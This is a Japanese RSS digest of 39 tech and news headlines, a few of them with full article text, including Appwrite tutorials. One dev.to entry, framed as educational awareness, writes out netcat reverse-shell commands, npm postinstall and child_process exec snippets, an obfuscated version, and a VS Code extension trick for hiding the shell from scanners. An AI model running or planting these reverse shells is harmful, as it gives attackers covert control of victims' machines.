投稿時間:2022-06-29 01:35:21 RSSフィード2022-06-29 01:00 分まとめ(39件)

カテゴリー等 サイト名等 記事タイトル・トレンドワード等 リンクURL 頻出ワード・要約等/検索ボリューム 登録日
IT ITmedia 総合記事一覧 [ITmedia ビジネスオンライン] エアコン故障回避テクニック 専門家に聞いた https://www.itmedia.co.jp/business/articles/2206/29/news056.html itmedia 2022-06-29 00:01:00
AWS AWS - Japan 詳しい人に聞いてみよう ! Everything fails, all the time 編 ~ #AWSDevLiveShow https://www.youtube.com/watch?v=akrNbubBivU 」ということで、ここは一回腹を割って、それぞれのインフラ、すなわちネットワーク、ストレージ、コンピュート、データベースの専門家にわからないことを聞いてみようと思いますその上で、私たちのプログラムをどうやったら障害に強いコードにしていけるのか、考えてみましょう。 2022-06-28 15:21:52
python Pythonタグが付けられた新着投稿 - Qiita Pythonで位置情報を活用したLINEボットを作ってみた https://qiita.com/kotmats/items/8de977eefcbb6d97ec1d 位置情報 2022-06-29 00:58:22
python Pythonタグが付けられた新着投稿 - Qiita 【Python】CPU使用率10%未満になるとGmailで報告 https://qiita.com/mugiGAN/items/2d8b3e4490967a5c4eba gmail 2022-06-29 00:19:05
js JavaScriptタグが付けられた新着投稿 - Qiita Azure Functions をバックエンドとした LINE Bot を作成する https://qiita.com/komiyasa/items/f09c1bbfa9013c693e0e messagin 2022-06-29 00:16:47
AWS AWSタグが付けられた新着投稿 - Qiita AWSアソシエイト 未経験者が勉強中に間違えたものpart3 https://qiita.com/shirochu0911/items/9846a7ab21f175eae65e amazonrd 2022-06-29 00:35:09
技術ブログ Developers.IO Notionのアカウントとワークスペースの関係と参加退出時の選択肢による影響について図解にしてみた https://dev.classmethod.jp/articles/about-notion-status-on-account-and-workspaces/ notion 2022-06-28 15:25:33
技術ブログ Developers.IO 【RPA】非エンジニアがUiPathで自動化ツールを作ってみた https://dev.classmethod.jp/articles/rpa-by-non-engineer/ roboticprocessautomation 2022-06-28 15:10:10
海外TECH Ars Technica New trailer offers first hint at Return to Monkey Island’s story https://arstechnica.com/?p=1863171 island 2022-06-28 15:36:14
海外TECH Ars Technica MNT shrinks its open source Reform laptop into a 7-inch pocket PC throwback https://arstechnica.com/?p=1863037 experiment 2022-06-28 15:19:09
海外TECH Ars Technica Climate change is altering the chemistry of wine https://arstechnica.com/?p=1863150 unpredictable 2022-06-28 15:07:45
海外TECH MakeUseOf The 5 Key Benefits of Driving an EV https://www.makeuseof.com/key-benefits-driving-ev/ benefits 2022-06-28 15:45:14
海外TECH MakeUseOf 4 Tips for Using WhatsApp Web's Privacy Settings https://www.makeuseof.com/whatsapp-web-privacy-settings-tips/ whatsapp 2022-06-28 15:31:14
海外TECH MakeUseOf How to Delete a File in Use by Another Program in Windows 10 https://www.makeuseof.com/tag/5-ways-delete-file-use-windows/ force 2022-06-28 15:15:14
海外TECH MakeUseOf How to Create and Use a Password Reset Disk in Windows 10 & 11 https://www.makeuseof.com/windows-password-reset-disk/ windows 2022-06-28 15:15:14
海外TECH DEV Community Announcing Modern CSS Challenges https://dev.to/5t3ph/announcing-modern-css-challenges-472o Announcing Modern CSS ChallengesOver the past few years I ve heard feedback that folks wish there was a learning journey available for using the Modern CSS tutorials to build up their CSS skills Today I m very excited to share the pre launch of Modern CSS Challenges an educational companion to the tutorials available on ModernCSS dev This free series of challenges will push you to use your existing CSS knowledge while also expanding your awareness and ability to use modern CSS features I ve created this resource as guided practice for building very real world components You ll work on responsive design using custom properties building scalable layouts and more All the while ensuring that you re including features critical for accessibility ️As you progress through the challenges bonus challenges will be unlocked to learn advanced skills and practice cutting edge CSS While free challenges include access to the basic solution I m also creating a thorough video series that you ll be able to purchase either per challenge or as package deals Videos will include full transcripts with code snippets so you can opt to read the content too ​Sign up for launch notificationsI m working through fine tuning the challenge content and videos and hope to launch in the next couple months I ll also be sharing a discount code for the videos and offering early access via my newsletter PS are you looking for hands on learning to update your CSS skills Join my comprehensive virtual CSS workshop starting July Register and learn more about the workshop 2022-06-28 15:39:48
海外TECH DEV Community Building a Realtime chat application using Angular and Appwrite 🤓 https://dev.to/appwrite/building-a-realtime-chat-application-using-angular-and-appwrite-i3o Building a Realtime chat application using Angular and Appwrite Appwrite is an open source backend as a service that provides developers with a core set of functionality needed to build any application with any stack From database interactions to authentication real time updates and more When building web applications with Angular it s common practice to connect to different APIs to manage data authenticate users and possibly listen to live updates to data The APIs to connect to these different services could be done through multiple providers With Appwrite you can do all of these things using a single backend This post shows you how to get up and running with Appwrite authenticate users manage data and listen to realtime events using a chat application PrerequisitesTo get started with Appwrite you need to have Docker installed on your local machine or server After you have Docker running use the following command to install and run Appwrite docker run it rm volume var run docker sock var run docker sock volume pwd appwrite usr src code appwrite rw entrypoint install appwrite appwrite Also check out the complete installation guide for more information about the process If everything went smoothly you can visit the Appwrite Console and register your root account Next let s set up the first project Creating a ProjectYou can host many different applications in Appwrite using projects To create a project Click on Create ProjectClick on the pencil icon and enter ngchat as the custom Project IDEnter Angular Chat as the nameClick CreateNext let s setup the database and collection for the chat application Creating a Database and CollectionA database in Appwrite is group of collections for managing data To create a database visit the Database section Click on Create DatabaseEnter chat as the custom Database IDEnter Chat as the nameClick CreateFor the collection Click on Create CollectionEnter messages as the custom Collection IDEnter Chat Messages as the nameClick CreateWe also want to configure permissions for the collection for read write access For messages you ll choose Document Level permissions You can choose more granular permissions depending on your use case The permissions page has more details on permissions so the user keeps ownership of their message Creating Collection AttributesEach collection in an Appwrite database consists of attributes that model the structure for the document you want to store For the chat application you ll store the user s name and message Creating Document AttributesAttributes can be defined as strings numbers emails and more To create an attribute Click on Create Attribute Select the type of Attribute to create Use the table below to create the necessary attributes for chat keysizerequiredarrayusertruefalsemessagetruefalseWhen a document is created in the collection it also has extra metadata for the when the document is created and updated named createdAt and updatedAt respectively You can use this metadata for querying syncing and other use cases You can do other things like toggle services choose which OAuth provider to use and more but for this chat application anonymous authentication is used which is also enabled by default Next let s put the Angular application together Building with AngularTo start clone an existing repository already running Angular version with a couple of routes setup for login and chat Use the command below to clone the GitHub repository git clone git github com brandonroberts appwrite angular chat gitInstall the dependencies yarnAnd start the application to get the development server runningyarn startNavigate to http localhost in the browser to view the login page Setting up the Appwrite ConfigTo configure Appwrite in our Angular project configure some environment variables first for the Appwrite endpoint project and collection values Update the src environments environment tsexport const environment endpoint http localhost v projectId ngchat databaseId chat chatCollectionId messages production false After the environment variables are set move on to setting up the Appwrite Web SDK To initialize the Appwrite Web SDK use the appwrite package installed earlier along with setting up some Injection Tokens in Angular to be able to inject the SDK into services created later Let s create tokens one for the Appwrite Environment variables and one for the SDK instance itself Create a new file named src appwrite ts and configure the tokens as root providers import inject InjectionToken from angular core import Account Client as Appwrite Databases from appwrite import environment from src environments environment interface AppwriteConfig endpoint string projectId string databaseId string chatCollectionId string export const AppwriteEnvironment new InjectionToken lt AppwriteConfig gt Appwrite Config providedIn root factory const endpoint projectId databaseId chatCollectionId environment return endpoint databaseId projectId chatCollectionId The first token sets up the environment variables so they can be injected to one or more services export const AppwriteApi new InjectionToken lt database Databases account Account gt Appwrite SDK providedIn root factory const env inject AppwriteEnvironment const appwrite new Appwrite appwrite setEndpoint env endpoint appwrite setProject env projectId const database new Databases appwrite env databaseId const account new Account appwrite return database account The second token creates an instance of the Appwrite Web SDK sets the endpoint to point to the running Appwrite instance and the project ID configured earlier After the Appwrite SDK is setup let s create some services for authentication and accessing chat messages First let s create an src auth service ts that allows you to login check auth status and logoutimport inject Injectable from angular core import Router from angular router import Models from appwrite import BehaviorSubject concatMap from tap mergeMap from rxjs import AppwriteApi from appwrite Injectable providedIn root export class AuthService private appwriteAPI inject AppwriteApi private user new BehaviorSubject lt Models User lt Models Preferences gt null gt null readonly user this user asObservable constructor private router Router login name string const authReq this appwriteAPI account createAnonymousSession return from authReq pipe mergeMap gt this appwriteAPI account updateName name concatMap gt this appwriteAPI account get tap user gt this user next user async isLoggedIn try const user await this appwriteAPI account get this user next user return true catch e return false async logout try await this appwriteAPI account deleteSession current catch e console log e finally this router navigate this user next null The AuthService injects the Appwrite SDK to Authenticate the user with the login method update the name and store the current user in an observable Checks to see if the user is logged in and returns a booleanLogs the user out by clearing the current sessionWith the Appwrite SDK all of this is done without using Angular s HttpClient service You can always access Appwrite s REST APIs directly but it s not required as the SDK handles this for you Next let s create the src chat service ts to load and send chat messages import inject Injectable from angular core import Models RealtimeResponseEvent from appwrite import BehaviorSubject take concatMap filter from rxjs import AppwriteApi AppwriteEnvironment from appwrite import AuthService from auth service export type Message Models Document amp user string message string Injectable providedIn root export class ChatService private appwriteAPI inject AppwriteApi private appwriteEnvironment inject AppwriteEnvironment private messages new BehaviorSubject lt Message gt readonly messages this messages asObservable constructor private authService AuthService loadMessages this appwriteAPI database listDocuments lt Message gt this appwriteEnvironment chatCollectionId undefined undefined ASC then response gt this messages next response documents sendMessage message string return this authService user pipe filter user gt user take concatMap user gt const data user user name message return this appwriteAPI database createDocument this appwriteEnvironment chatCollectionId unique data role all user user id The ChatService Injects the Appwrite Environment variablesSets up an observable of chat messagesUses the Appwrite SDK to load chat messages from the messages collectionGets the currently logged in user to add chat messages to the messages collection Assigns permissions to the document so anyone can read but only the specific user can update delete With the services set up we can move on to the components for login and chat Building the Login pageFor the login component use the AuthService to login using anonymous authentication with the provided name ​import Component from angular core import FormControl FormGroup ReactiveFormsModule from angular forms import Router from angular router import tap from rxjs import AuthService from auth service Component selector app login standalone true imports ReactiveFormsModule template lt div class app container gt lt div class content gt lt span class appwrite chat gt Angular Chat lt span gt lt div class login container gt lt form formGroup form class login form ngSubmit login gt lt p class login name gt lt label for name gt Name lt label gt lt input type text id name formControlName name placeholder Enter Name gt lt p gt lt button type submit gt Start Chatting lt button gt lt form gt lt div gt lt div gt lt div gt export class LoginComponent form new FormGroup name new FormControl nonNullable true constructor private authService AuthService private router Router login const name this form controls name value this authService login name pipe tap gt this router navigate chat subscribe After the authentication is successful we redirect to the chat page Displaying Chat MessagesWith the Chat component start with displaying chat messages using the ChatService ​​import CommonModule from angular common import Component OnInit from angular core import FormControl FormGroup ReactiveFormsModule from angular forms import tap from rxjs import ChatService from chat service import AuthService from auth service Component selector app chat standalone true imports CommonModule ReactiveFormsModule template lt div class chat container ngIf user async as vm else loading gt lt div class chat header gt lt div class title gt Let s Chat lt div gt lt div class leave click logout gt Leave Room lt div gt lt div gt lt div class chat body gt lt div id message id ngFor let message of messages async class message gt lt span class name gt message user lt span gt message message lt div gt lt div gt lt div class chat message gt lt form formGroup form ngSubmit sendMessage gt lt input type text formControlName message placeholder Type a message gt lt button type submit class send message gt lt svg class arrow width height viewBox fill none xmlns gt lt path d M C C L C C L C VC C VC L C C L Z fill BD gt lt svg gt lt button gt lt form gt lt div gt lt div gt lt ng template loading gt Loading lt ng template gt styles export class ChatComponent implements OnInit form new FormGroup message new FormControl nonNullable true user this authService user messages this chatService messages constructor private authService AuthService private chatService ChatService ngOnInit this chatService loadMessages sendMessage const message this form controls message value this chatService sendMessage message pipe tap gt this form reset subscribe async logout await this authService logout The ChatComponent makes use of the AuthService and ChatService to Use the current logged in userListen to the observable of chat messages Load the chat messages in the ngOnInit of the componentUse the input field to send the message using the ChatServiceLogout from the chat pageWe re able to load chat messages but let s add the interesting part and integrate some realtime chat messages Connecting to Realtime EventsAppwrite provides realtime updates from practically every event that happens in the Appwrite system such as database records being inserted updated or deleted These events are provided through a WebSocket To subscribe to realtime update the ChatService with a listenToMessages method to subscribe to events from the messages collection export class ChatService listenToMessages return this appwriteAPI database client subscribe databases chat collections messages documents res RealtimeResponseEvent lt Message gt gt if res events includes databases chat collections messages documents create const messages Message this messages value res payload this messages next messages Whenever a new message is created the new message is pushed into the observable of users so we have realtime updates wired up To start listening to realtime events Update the ngOnInit of the ChatComponent to call the method Store the live connection for unsubscribing Destroy the live connection when the component is destroyedexport class ChatComponent implements OnInit OnDestroy messageunSubscribe gt void form new FormGroup message new FormControl nonNullable true user this authService user messages this chatService messages constructor private authService AuthService private chatService ChatService ngOnInit this chatService loadMessages this messageunSubscribe this chatService listenToMessages ngOnDestroy this messageunSubscribe SummaryAnd that s it We now have a functioning Angular application with AuthenticationDatabase managementRealtime eventsThere s more we could do here but as you can see you can build just about anything with the core functionality already taken care of And cloud functions help you extend the functionality of Appwrite even further To view the working example GitHub Repo Learn MoreGetting Started TutorialAppwrite GitHubAppwrite DocsDiscord CommunityIf you liked this click the ️so other people will see it Follow Brandon Roberts and Appwrite on Twitter for more updates 2022-06-28 15:19:15
海外TECH DEV Community Custom Svelte Store with Appwrite and Caching https://dev.to/appwrite/custom-svelte-store-with-appwrite-and-caching-1m6d Custom Svelte Store with Appwrite and CachingWho wouldn t love cache right Let s see how we can cache data with Svelte amp Appwrite We re going to explore how we can create a Svelte store that caches our data and is dynamically updated Luckily for us it s pretty easy The TL DR is Create a store with set subscribe and loadSet the data to the cacheUpdate the cache by subscribing to the data changesUpdate the data dynamically by calling the load function in your component Let s set everything up We ll start by creating an appwrite js store to make our life easier import Client from appwrite const server endpoint import meta env VITE APP ENDPOINT toString project import meta env VITE APP PROJECT toString collection import meta env VITE APP COLLECTION ID toString database import meta env VITE APP DATABASE ID toString const client new Client client setEndpoint server endpoint setProject server project export client server You can check a complete example hereThis allows us to access Appwrite s sdk from wherever we want Remember to add all the endpoints in the env file at your project s root The fun begins Now let s initialize another store where we will implement our caching import client server from appwrite This is the store we created previouslyimport Databases from appwrite import writable from svelte store import browser from app env We ll use this to check if we are in the browserfunction createDocumentsListStore Magic unicorns export const documentsList createDocumentsListStore Great Let s work a little bit on that function We want to create a writable store that can fetch our cached data and is easy to update function createDocumentsListStore const subscribe set writable Check if we re in the browser If we are check the session storage for a item named documents and parse it This is our response If we re not in the browser or if there is no item stored the response is null response browser JSON parse sessionStorage getItem documents null return subscribe set load async queries limit offset gt try const database new Databases client server database const response database listDocuments server collection We imported server from the appwrite js store queries limit offset undefined undefined created at DESC set response catch error Handle the error So with this function we check if there is data in the session storage and set the response to it Where s my cache We have a small problem we ve yet to save anything in our cache Luckily for us it s pretty straightforward if browser documentsList subscribe n gt sessionStorage setItem documents JSON stringify n response We simply subscribe to the store and save the data in the session storage each time it changes set subscribe loadNow we have another problem The data is set and our cache is always up to date but the data never changes That s what load is for For example in our component we can do something like this lt script gt import documentsList from store let queries limit offset documentsList load queries limit offset lt script gt if documentsList response total each documenstList response document as document lt pre gt document lt pre gt each if This way each time one of the arguments passed to load changes the data will be updated And now we have an Appwrite store with cached data Let s put it all together In the end our store looks like this import client server from appwrite import Databases from appwrite import writable from svelte store import browser from app env function createDocumentsListStore const subscribe set writable response browser JSON parse sessionStorage getItem documents null return subscribe set load async queries limit offset gt try const database new Databases client server database const response database listDocuments server collection queries limit offset undefined undefined created at DESC set response catch error Handle the error export const documentsList createDocumentsListStore if browser documentsList subscribe n gt sessionStorage setItem documents JSON stringify n response ConclusionAnd that s all it takes to implement a custom svelte store with Appwrite amp caching You can view the following resources as well if you want to explore Appwrite further Appwrite DocsAppwrite DiscordAppwrite GitHub 2022-06-28 15:10:53
海外TECH DEV Community Gaining remote access to a computer with a reverse shell attack in Node.js https://dev.to/devdevcharlie/gaining-remote-access-to-a-computer-with-a-reverse-shell-attack-in-nodejs-3a40 Gaining remote access to a computer with a reverse shell attack in Node jsOriginally posted on my blogI recently learnt what a reverse shell is and got excited to experiment running this kind of attack via a Node js module This post will go through my thought process and the different options I tried ️Important notes ️I am writing this blog post for educational purposes only Running a reverse shell attack on someone without their approval is illegal my only motivation is to share knowledge and raise awareness so people can protect themselves I am not taking any responsibility for how you decide to use the information shared in this post What is a reverse shell A reverse shell is a tool that allows a computer to have remote access to another one It can be very useful if you want to transfer files between multiple computers or if you want to access information you need that is stored on another computer and network However it can also be used to run attacks in which a victim unknowingly initiates a remote shell connection to an attacker s system allowing the attacker to have nearly complete access to their system If you think about shell commands you might be familiar with such as ls to list a directory s files pwd to show the path to the current directory or nano to edit the content of files a reverse shell allows an attacker to run these commands on a target s system without them knowing How to create a reverse shellA common tool to execute a reverse shell is called netcat If you re using macOS it should be installed by default You can check by running nc help in a terminal window Using a private IP address on a local networkYou can run a simple example of reverse shell between two computers on the same network On the first computer start two listeners on different ports for example one on port and the other on port Command tested on macOS the path to netcat is different on other OS usr bin nc l usr bin nc l The flag l starts netcat on listening mode so it will listen to traffic happening on these two ports On the second computer run the following command nc lt first computer IP address gt bin sh nc lt first computer IP address gt This command initiates a connection to the first computer on the two ports specified above and indicates that any command received on port should be executed as a bash command and send the result to port Below is an example of this code working As a second computer I have a Raspberry Pi set up in my apartment connected to the same network as my laptop In the terminal I ssh into the Pi in the first pane The second and third pane start the listeners on port and When the listeners are ready I run the netcat command in the Pi From there I m able to access its file system from my laptop I run commands such as ls whoami and pwd in the terminal window listening on port and the result shows in the third pane on the far right I m also able to change the name of a file from test js to index js You can imagine how useful this tool is for example if you want to transfer files easily between two computers on the same network Using a public IP addressIn the example above I showed how to create a reverse shell between computers on the same network however when running this as an attack to gain access to a victim s computer both devices will probably be connected to different networks so the code above won t work Indeed the code sample shown in the previous section uses the device s private IP address on my local network This private IP address cannot be accessed from outside my home network To be able to use a public IP address I ve decided to use Linode to create a virtual machine VM that both the target and attacker will connect to Once the VM finished spinning up I replaced the private IP address from the code above with the public IP address of the VM For the purpose of this post let s imagine this IP address is From my laptop I connect to my VM using the following command ssh root From there similar commands from the ones shown in the previous section can be run nc l s nc l s The additional s is used to indicate the source IP address so the VM s public IP address Then on the target s computer the following command needs to be run nc bin sh nc disown exit The additional disown is used to run the program continuously in the background and exit is used to terminate it so the terminal does not look like the program is still executing even though it is Once these commands are run I have access to the second computer s system no matter if it is inside or outside of my home network So now how can we get a target to run this Running a reverse shell in a Node js moduleA few weeks ago I wrote a post about how to run a ransomware attack in a Node js module and in the same spirit I explored a few different ways to run a reverse shell attack using the same medium postinstallOne way to run this would be to take advantage of the postinstall attribute of a module s package json file This command runs right after a package has finished installing so it wouldn t even require the target to import and use it This could be done in two ways first by running the command directly scripts postinstall nc bin sh nc exit Or running the command in a separate JavaScript file scripts postinstall node index js Even though using postinstall would work it may look quite obvious if a user decided to look at the source code before installing the package especially if the command is run directly so the package could get flagged quickly If postinstall is running a JS file it might look less obvious but how would it start the reverse shell Using exec or execFileTo run this command in a JS file you can use exec and execFile exec executes the command passed to the function const exec require child process exec nc bin sh nc disown exit process exit execFile executes a file for example script sh const execFile require child process execFile bash script sh gt process exit This shell script would contain the netcat command bin bashnc bin sh nc disown exit It can either be added as a file in the repository or fetched from another source to avoid attracting attention As soon as the reverse shell is set up an attacker can steal delete or encrypt files install tools and much more The solutions shown above are picked up by security tools such as Socket that flags the use of potentially insecure code such as exec and execFile So what are ways to hide more efficiently this kind of attack Ways to hide a reverse shellThere s a few ways I could think about doing this some of them involve technical solutions and others involve thinking more about the context in which people use Node js modules File obfuscation and minification Security tools are getting better at flagging potential insecure code in Node js modules however once obfuscated it becomes a lot harder to know if a piece of code contains vulnerabilities As an example here s what the obfuscated JavaScript of the exec implementation looks like function x xd xb const xedb xedb return x function xb xcb xb xb xf let xdf xedb xb return xdf x xd xb const xc x function xedb const xac MInyns gpQMch EjKPYz nc x x x x bin sh x xnc x x x xdisown x xexit x child process ptslNj JPSbno ymqHPE exit xLEENc KPUPMs cCpfRb Neccgv QTYiZY xedb function return xac return xedb function xef xfb const xdea x xbcaca xef while try const xa parseInt xdea x x parseInt xdea xb x parseInt xdea x x parseInt xdea x x parseInt xdea xc x parseInt xdea x x parseInt xdea x x parseInt xdea x x parseInt xdea x x parseInt xdea x xa parseInt xdea xa xb if xa xfb break else xbcaca push xbcaca shift catch xb xbcaca push xbcaca shift xedb xd const exec require xc x exec xc x process xc xf x This code still works but isn t flagged anymore You could imagine that a package author could hide this code in a minified version of their package and advise people to use that one for improved performance I also tested this by minifying the original code which is still humanly readable Here s the result const exec exec require child process exec nc bin sh nc disown exit process exit By default if the file index min js is not specified as the exported file in the main field of the package json Socket does not flag any issue However once changed to index min js the security issues are shown in the UI VSCode extensionEven though VSCode extensions are NPM packages the way users install them is via the VSCode editor so it is likely that people use the ease of a one click install without checking the extension s code first Extensions may go through a security check before being publicly available however some attacks have been run via extensions When creating an extension you can specify when you d like the code to run including anytime the editor is launched To do so you can specify the value or onStartupFinished as activationEvents This would call the activate function that can be modified to run the reverse shell by adding a single line of code exec nc bin sh nc disown exit To try this out I created a small Hello World extension following the official documentation I added the line shown above in the activate function ran the extension in the Extension Development Host window and activated it Below is the result showing how I gained access to my personal laptop from my RaspberryPi I am not sure what kind of security process extensions go through before being publicly available but it is also possible for developers to make their extensions available via GitHub instead of the VSCode Marketplace This way even if this extension was rejected for security reasons an attacker might still try to make it available by instructing users to install it manually Electron appElectron applications are also written in Node js and can be installed without checking the source code first Looking at this list of Electron apps it is easy to imagine how one could create a small productivity app with a hidden reverse shell How can people protect themselves One of the interesting aspects of experimenting with this is to think about ways people can protect themselves from these types of attacks So far here are a few options I can think of Use one of the many security tools available and pay attention to their warnings Check the source code of open source tools before installing and using them Run your projects in a virtual machine or online sandbox such as CodeSandbox StackBlitz Github CodeSpacesTo check for reverse shell attacks specifically you can run the ps command in your terminal to check the current processes running and terminate any that looks suspicious When using a minified version of a NPM package make sure it does not include some unexpected code by copying the non minifed version of the tool minifying it yourself and comparing the results A way to stop the connection established by a reverse shell could be to turn your computer off on however if hidden in a package you use often the connection would restart anytime you use that package Some of these solutions may sound a bit impractical but depending on the risk you re willing to take it is definitely something worth thinking about ConclusionThere are probably more ways to run a reverse shell than the ones I explored here but I hope this post gave you a better understanding of what a reverse shell is how to create one and raised some awareness of the risks associated with using open source packages 2022-06-28 15:06:44
Apple AppleInsider - Frontpage News AirTags help Toronto man track down stolen Range Rover https://appleinsider.com/articles/22/06/28/airtags-help-toronto-man-track-down-stolen-range-rover?utm_medium=rss AirTags help Toronto man track down stolen Range RoverThree AirTag trackers helped the owner of the SUV locate the vehicle which was then recovered by police After having his first Range Rover stolen a month ago a man from the Avenue Road and Lawrence Avenue area of Toronto Ontario Canada purchased an identical unit to replace the lost vehicle The first unit was never found as the thief as thrown the owner s wallet and family members phone out of the Rover before driving off with it in an apparent attempt to prevent tracking The thieves were able to disable the tracker in my car put there by the manufacturer according to the man who for safety concerns has been identified only by his first name Lorne Read more 2022-06-28 15:54:54
Apple AppleInsider - Frontpage News Deals: save $220 on Apple's 1TB 14-inch MacBook Pro, but only for a limited time https://appleinsider.com/articles/22/06/28/deals-save-220-on-apples-1tb-14-inch-macbook-pro-but-only-for-a-limited-time?utm_medium=rss Deals save on Apple x s TB inch MacBook Pro but only for a limited timeThe exclusive MacBook Pro deal drops the price of the spacious TB inch MacBook Pro to a discount of off retail now through June Take advantage of the cheapest price available on Apple s TB inch MacBook Pro through June B amp H Photo is hosting the best of the web offer on the M Pro MacBook Pro inch in your choice of Silver or Space Gray Equipped with an upgraded M Pro chip with a core CPU core GPU and GB of unified memory this configuration also has TB of storage ーdouble that of the standard inch MacBook Pro Read more 2022-06-28 15:31:14
海外TECH Engadget Google is trying to keep political campaign emails out of Gmail spam folders https://www.engadget.com/google-gmail-political-campaign-emails-spam-folder-151541496.html?src=rss Google is trying to keep political campaign emails out of Gmail spam foldersGoogle is working on a way to ensure emails from US political campaigns reach users Gmail inboxes instead of automatically getting dumped into the spam folder The company has asked the Federal Election Commission for approval on a plan to make emails from quot authorized candidate committees political party committees and leadership political action committees registered with the FEC quot exempt from spam detection as long they abide by Gmail s rules on phishing malware and illegal content “We want Gmail to provide a great experience for all of our users including minimizing unwanted email but we do not filter emails based on political affiliation quot Google spokesperson JoséCastañeda told Axios which first reported on the move Castañeda added that the pilot program quot may help improve inboxing rates for political bulk senders and provide more transparency into email deliverability while still letting users protect their inboxes by unsubscribing or labeling emails as spam quot If the project goes ahead users will see a prominent notification the first time they receive an email from a campaign They ll be asked if they want to keep receiving such emails They ll be able to opt out of campaign notices later too That should help cut down on unwanted campaign emails especially for users who didn t sign up to receive them in the first place while making sure they still hit inboxes Google has noted that a key reason why Gmail puts many campaign emails in the spam folder is because other users often mark the missives as spam A North Carolina State University study from earlier this year found that Gmail was more likely than Yahoo Engadget s parent company and Microsoft Outlook to algorithmically filter emails from Republican campaigns as spam during the campaign Republican leaders this month introduced a bill that seeks to make it illegal for email service providers to automatically put campaign messages in the spam folder It would also require operators to issue a quarterly transparency report detailing how many times campaign messages were flagged as spam with breakdowns for emails from both the Republican and Democratic parties In addition providers would have to disclose the tools they use to determine which campaign emails to mark as spam 2022-06-28 15:15:41
Cisco Cisco Blog Cisco Talos Supports Ukraine Through Empathy https://blogs.cisco.com/security/cisco-talos-supports-ukraine-through-empathy employees 2022-06-28 15:56:55
海外TECH WIRED 17 Best Early Amazon Prime Day Deals https://www.wired.com/story/early-amazon-prime-day-deals-and-tips-2022-1/ event 2022-06-28 15:09:00
金融 金融庁ホームページ 「FinTech実証実験ハブ」支援決定案件の実験結果について公表しました。 https://www.fsa.go.jp/news/r3/sonota/20220628/20220628.html fintech 2022-06-28 17:00:00
ニュース BBC News - Home Scottish independence: 19 October 2023 proposed as date for referendum https://www.bbc.co.uk/news/uk-scotland-scotland-politics-61968607?at_medium=RSS&at_campaign=KARANGA court 2022-06-28 15:49:24
ニュース BBC News - Home Met Police placed into advanced stage of monitoring https://www.bbc.co.uk/news/uk-england-london-61970399?at_medium=RSS&at_campaign=KARANGA everard 2022-06-28 15:46:45
ニュース BBC News - Home BBC pays damages to ex-producer over Martin Bashir's Princess Diana interview https://www.bbc.co.uk/news/entertainment-arts-61959015?at_medium=RSS&at_campaign=KARANGA diana 2022-06-28 15:13:20
ニュース BBC News - Home England's Morgan confirms international retirement https://www.bbc.co.uk/sport/cricket/61966257?at_medium=RSS&at_campaign=KARANGA cricket 2022-06-28 15:24:12
北海道 北海道新聞 野付湾に伝統の風 夏のシマエビ漁始まる https://www.hokkaido-np.co.jp/article/699234/ 根室管内 2022-06-29 00:54:16
北海道 北海道新聞 ロシア大統領、中央アジア訪問 侵攻後初外遊、結束確認 https://www.hokkaido-np.co.jp/article/699259/ 中央アジア 2022-06-29 00:54:00
北海道 北海道新聞 土居、ダニエル1回戦敗退 ウィンブルドン第2日 https://www.hokkaido-np.co.jp/article/699258/ 敗退 2022-06-29 00:49:00
北海道 北海道新聞 電力「逼迫準備」を継続 北電ネット 政府は注意報見送り https://www.hokkaido-np.co.jp/article/699243/ 北海道電力 2022-06-29 00:38:45
北海道 北海道新聞 西5―2日(28日)日本ハム連勝ならず https://www.hokkaido-np.co.jp/article/699189/ 日本ハム 2022-06-29 00:33:53
北海道 北海道新聞 米、ロシア産金の輸入禁止 防衛産業に制裁も https://www.hokkaido-np.co.jp/article/699246/ 米財務省 2022-06-29 00:20:00
北海道 北海道新聞 92歳男性、首絞められ死亡 仙台、負傷の息子聴取方針 https://www.hokkaido-np.co.jp/article/699242/ 仙台市宮城野区 2022-06-29 00:14:00
北海道 北海道新聞 涼しい道内 どう節電 電力「逼迫準備」続く 「冷房ないのに」困惑の声 https://www.hokkaido-np.co.jp/article/699239/ 北海道電力 2022-06-29 00:10:00
北海道 北海道新聞 道内、29日も大雨の見通し https://www.hokkaido-np.co.jp/article/699238/ 道内 2022-06-29 00:05:00
北海道 北海道新聞 海保新長官が就任会見「知床事故、捜査に全力」 https://www.hokkaido-np.co.jp/article/699236/ 国土交通省 2022-06-29 00:02:00

コメント

このブログの人気の投稿

投稿時間:2021-06-17 22:08:45 RSSフィード2021-06-17 22:00 分まとめ(2089件)

投稿時間:2021-06-20 02:06:12 RSSフィード2021-06-20 02:00 分まとめ(3871件)

投稿時間:2021-06-17 05:05:34 RSSフィード2021-06-17 05:00 分まとめ(1274件)